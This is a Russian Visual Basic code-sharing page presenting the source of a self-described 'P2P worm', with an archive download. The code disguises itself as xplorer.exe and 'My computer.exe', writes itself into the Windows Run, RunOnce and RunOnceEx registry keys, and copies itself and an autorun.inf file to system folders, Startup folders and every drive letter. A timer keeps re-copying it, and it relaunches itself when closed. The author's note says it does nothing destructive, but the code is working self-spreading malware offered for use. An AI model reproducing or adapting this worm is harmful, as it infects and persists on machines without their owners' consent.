Мой Kbyte.Ru
Рассылка Kbyte.Ru
Группы на Kbyte.Ru
Партнеры Kbyte.Ru
Реклама
Сделано руками
Сделано руками
> Исходные коды - Ярослав (comexe) Филипченко -

Visual Basic 5.0/6.0 - Разное

Все примеры / Разное

Червяк P2P

Автор: Ярослав (comexe) Филипченко | добавлено: 06.03.2010, 11:46 | просмотров: 2078 (1+) | комментариев: 0 | рейтинг: *x0
Представляет собой исходник червяка. Внимание!!! Код не безобидный!!! Но сам вирус деструктивных действий не выполняет, регистрируется в реестре и копирует себя в разные папки. Подробнее в !comexe.nfo кодировка dos cyrillic.

Код

Dim copy
Dim pageonwww
Dim Security As SECURITY_ATTRIBUTES
Dim retval As Long

retval = CreateDirectory("C:\Program Files\Microsoft", Security)
'1
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program files\My computer.exe", &H1)

'2
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)

'3
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
'4
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)

pageonwww = ShellExecute(Me.hwnd, "Open", "C:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "D:\xplorer.exe", "", App.Path, 1)

copy = CopyFile("xplorer.exe", "C:\Program Files\Microsoft\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "C:\Documents and Settings\All Users\Application Data\Microsoft\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "C:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "D:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "F:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "G:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "H:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "I:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "E:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "Y:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "Z:\xplorer.exe", 1)

copy = CopyFile("xplorer.exe", "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", 1)
copy = CopyFile("xplorer.exe", "C:\Program files\Common files\Microsoft.exe", 1)
copy = CopyFile("xplorer.exe", "C:\Program files\My computer.exe", 1)

copy = CopyFile("xplorer.exe", "C:\Documents and Settings\Default User\Главное меню\Программы\Автозагрузка\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "C:\Documents and Settings\Default User\Start menu\Programs\Startup\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "C:\Documents and Settings\All Users\Start menu\Programs\Startup\xplorer.exe", 1)

copy = CopyFile("autorun.inf", "C:\Documents and Settings\Default User\Главное меню\Программы\Автозагрузка\autorun.inf", 1)
copy = CopyFile("autorun.inf", "C:\Documents and Settings\Default User\Start menu\Programs\Startup\autorun.inf", 1)
copy = CopyFile("autorun.inf", "C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\autorun.inf", 1)
copy = CopyFile("autorun.inf", "C:\Documents and Settings\All Users\Start menu\Programs\Startup\autorun.inf", 1)

copy = CopyFile("autorun.inf", "C:\Program Files\Microsoft\autorun.inf", 1)
copy = CopyFile("autorun.inf", "C:\Documents and Settings\All Users\Application Data\Microsoft\autorun.inf", 1)
copy = CopyFile("autorun.inf", "C:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "D:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "F:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "G:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "H:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "I:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "E:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "Y:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "Z:\autorun.inf", 1)
End Sub

Private Sub Form_Terminate()
Dim pageonwww

pageonwww = ShellExecute(Me.hwnd, "Open", "C:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "D:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "E:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "F:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "G:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "H:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "I:\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "C:\Program Files\Microsoft\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "C:\Documents and Settings\All Users\Application Data\Microsoft\xplorer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "C:\Program files\Common files\Microsoft.exe", "", App.Path, 1)
pageonwww = ShellExecute(Me.hwnd, "Open", "C:\Program files\My computer.exe", "", App.Path, 1)
'1
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program files\My computer.exe", &H1)

'2
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)

'3
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
'4
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program files\My computer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Program Files\Microsoft\xplorer.exe", &H1)
retval = RegSetValue(&H80000001, "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx", REG_SZ, "C:\Documents and Settings\LocalService\Local Settings\Temp\My computer.exe", &H1)
End Sub



Private Sub Timer1_Timer()
copy = CopyFile("xplorer.exe", "C:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "D:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "F:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "G:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "H:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "I:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "E:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "Y:\xplorer.exe", 1)
copy = CopyFile("xplorer.exe", "Z:\xplorer.exe", 1)
copy = CopyFile("autorun.inf", "C:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "D:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "F:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "G:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "H:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "I:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "E:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "Y:\autorun.inf", 1)
copy = CopyFile("autorun.inf", "Z:\autorun.inf", 1)
End Sub
Файлы cherviak_p2p.rar (35,55 Кб)
Обратите внимание
Язык Visual Basic 6.0 является устаревшим. Многие примеры, размещенные на нашем сайте, были созданы еще во времена Windows 98 и могут не работать в современных операционных системах.
Если у вас возникнут какие-либо проблемы или вопросы, вы можете обратиться за помощью на наш форум.
Об авторе

Ярослав (comexe) Филипченко

Инженер по промышленной автоматизации

См. также:
Профиль автора
Ярослав (comexe) Филипченко
Другие примеры этого автора (всего: 3)
Последние комментарии (всего: 0)

Добавлять комментарии могут только зарегистрированные пользователи сайта.
Если у Вас уже есть учетная запись на Kbyte.Ru, пройдите процедуру авторизации OpenID.
Если Вы еще не зарегистрированы на Kbyte.Ru - зарегистрируйтесь.


Нет комментариев...

Авторизация
 
OpenID
Зарегистрируйся и получи 10% скидку на добавление своего сайта в каталоги! Подробнее »
Поиск по сайту
Реклама
Счетчики